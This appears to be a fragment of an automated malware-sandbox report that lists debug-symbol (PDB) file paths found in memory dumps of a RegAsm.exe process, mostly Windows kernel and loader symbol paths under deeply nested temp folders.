        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qiC:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qmC:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qnC:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qjC:\Documents and Settings\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qiC:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: t:\naveen\pgms\cpp\openfilefinder_src_vc8\listfiledrv\objfre_wxp_x86\i386\ListOpenedFileDrv.pdb source: RegAsm.exe, 0000000F.00000002.3703692097.0000000000702000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q~C:\Documents and Settings\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qHC:\Documents and Settings\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q\C:\Documents and Settings\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q~C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: t:\Naveen\mysvn\OpenFileFinder_src_vc8\OpenFileFinder\bin\win32\release\OpenFileFinder.pdb source: RegAsm.exe, 0000000F.00000002.3703692097.0000000000702000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q~C:\Documents and Settings\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qYC:\Documents and Settings\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qjC:\Documents and Settings\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q{C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
